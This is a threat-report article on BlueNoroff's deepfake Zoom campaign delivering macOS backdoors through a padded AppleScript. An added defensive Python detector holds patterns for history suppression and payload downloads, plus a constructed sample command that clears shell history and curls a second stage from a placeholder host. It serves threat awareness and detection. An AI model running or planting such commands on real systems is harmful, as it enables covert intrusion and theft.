BlueNoroff group launches sophisticated social engineering/malware campaign that leverages deepfake video tech in Zoom calls.

The North Korean-linked BlueNoroff group, also known as Sapphire Sleet or TA444, has launched a sophisticated social engineering campaign targeting employees in the cryptocurrency sector, specifically those using macOS devices. This latest attack leverages deepfake technology and fake Zoom meetings to deliver backdoor malware.

Attack Chain Breakdown

The attack begins with a message sent via Telegram from an external contact to a crypto foundation employee, requesting a meeting. The attacker provides a Calendly link for scheduling, which is disguised as a Google Meet invite but actually redirects to a fake Zoom domain under the attacker’s control.

After several weeks, the victim joins a group Zoom call that features deepfaked video representations of known company executives and other external contacts. During the meeting, the victim is told their microphone isn’t working. The deepfaked personas urge them to download a “Zoom extension” to fix the issue.

Malware Delivery

The extension link, sent via Telegram, delivers an AppleScript file named zoom_sdk_support.scpt. The script opens a legitimate Zoom SDK webpage to appear authentic but, after thousands of blank lines, downloads a second-stage payload from a malicious domain controlled by the attackers (support.us05web-zoom.biz). The script disables bash history logging, checks for and installs Rosetta 2 (to ensure compatibility with x86_64 payloads on Apple Silicon Macs), and then downloads and executes further malware, hiding its activities from the user.
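As an added defender-side example (not code from the original report or from the attackers), the following Python triage script flags an AppleScript source that shows the traits described above: a long run of padding blank lines, bash-history suppression, a Rosetta 2 install, a shell download of a further stage, and the reported domain. The regexes, thresholds and sample script are assumptions constructed for illustration.

```python
import re

# Heuristics mirroring the reported zoom_sdk_support.scpt traits: a decoy
# "open location", thousands of blank lines of padding, bash-history
# suppression, a Rosetta 2 install, and a shell download of a second stage.
HISTORY_RE = re.compile(r"unset\s+HISTFILE|set\s+\+o\s+history|HISTSIZE=0", re.I)
ROSETTA_RE = re.compile(r"softwareupdate\s+--install-rosetta", re.I)
DOWNLOAD_RE = re.compile(r"do shell script\s+\".*\b(curl|wget)\b", re.I)
# Domain reported in the article; extend from your own intel feed.
KNOWN_BAD_DOMAINS = {"support.us05web-zoom.biz"}

def max_blank_run(text: str) -> int:
    """Length of the longest run of consecutive blank lines."""
    longest = run = 0
    for line in text.splitlines():
        run = run + 1 if line.strip() == "" else 0
        longest = max(longest, run)
    return longest

def triage_applescript(text: str, blank_threshold: int = 500) -> list[str]:
    """Return human-readable findings for a .scpt source; empty list = clean."""
    findings = []
    run = max_blank_run(text)
    if run >= blank_threshold:
        findings.append(f"blank-line padding ({run} consecutive blank lines)")
    if HISTORY_RE.search(text):
        findings.append("shell history suppression")
    if ROSETTA_RE.search(text):
        findings.append("Rosetta 2 install")
    if DOWNLOAD_RE.search(text):
        findings.append("shell download of additional payload")
    for dom in KNOWN_BAD_DOMAINS:
        if dom in text:
            findings.append(f"known BlueNoroff domain {dom}")
    return findings

# Constructed sample (not the real script): decoy page, padding, then the
# shell stage. The download host is a placeholder, not a real indicator.
SAMPLE_SCRIPT = (
    'open location "https://example.invalid/zoom-sdk-docs"\n'
    + "\n" * 3000
    + 'do shell script "unset HISTFILE; softwareupdate --install-rosetta '
      '--agree-to-license; curl -s https://placeholder.invalid/s2 -o /tmp/z"\n'
)
BENIGN_SCRIPT = 'display dialog "Meeting starts in 5 minutes"\n'

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_SCRIPT), ("benign", BENIGN_SCRIPT)):
        print(name, triage_applescript(src) or ["clean"])
```

Run it over the decompiled text of any .scpt delivered through an unsolicited "Zoom extension" link; a hit on two or more findings is worth escalating even when the opening `open location` looks legitimate.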

Technical Details and Capabilities

• The malware is designed to evade detection and maintain persistence on macOS, even bypassing some of Apple’s newer security features.
• Once installed, it allows remote shell access and command execution, giving attackers full control over the compromised system.
• The final payload is capable of exfiltrating sensitive data and is believed to be aimed at cryptocurrency theft, consistent with BlueNoroff’s history.

BlueNoroff’s focus on macOS users in the crypto sector demonstrates a shift from traditional Windows-based attacks and shows the group’s evolving tactics.